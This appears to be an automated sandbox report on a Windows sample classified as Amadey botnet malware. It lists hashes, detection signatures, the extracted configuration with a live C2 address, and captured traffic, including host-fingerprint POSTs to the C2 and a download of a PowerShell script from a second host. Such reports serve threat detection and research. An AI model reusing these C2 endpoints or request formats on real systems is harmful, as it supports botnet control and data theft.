Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561683
MD5: 5ca58d76edc0e7291bf3d6bad7edbbe9
SHA1: 694124bf2e8d817b7f188706bbc49d0088317fe2
SHA256: d4e13faefc09eb85be337713e8899e9f6761d45593e33d19b14ac6f986b2a103
Tags: exeuser-Bitsight

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

Source: file.exe Avira: detected
Source: http://185.215.113.43/Zu7JuNko/index.phpkAl Avira URL Cloud: Label: malware
Source: http://185.215.113.43/3405117-2476756634-1003 Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php;A Avira URL Cloud: Label: malware
Source: 00000002.00000003.2080301971.0000000005470000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: http://185.215.113.43/Zu7JuNko/index.php;A Virustotal: Detection: 16% Perma Link
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 55%
Source: file.exe ReversingLabs: Detection: 55%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50095 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50094 version: TLS 1.2
Source: firefox.exe Memory has grown: Private usage: 1MB later: 252MB

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49812 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49881 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49869
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /files/5124158732/KQGBYWk.ps1 HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 36 31 35 30 34 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008615041&unit=246122658369
Source: Joe Sandbox View IP Address: 185.215.113.43
Source: Joe Sandbox View IP Address: 13.107.246.40
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49872 -> 31.41.244.11:80
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ECBE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_00ECBE30
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=SrGlYPw41PRTGFr&MD=BoDgbOTN HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=SrGlYPw41PRTGFr&MD=BoDgbOTN HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 | Host: slscr.update.microsoft.com
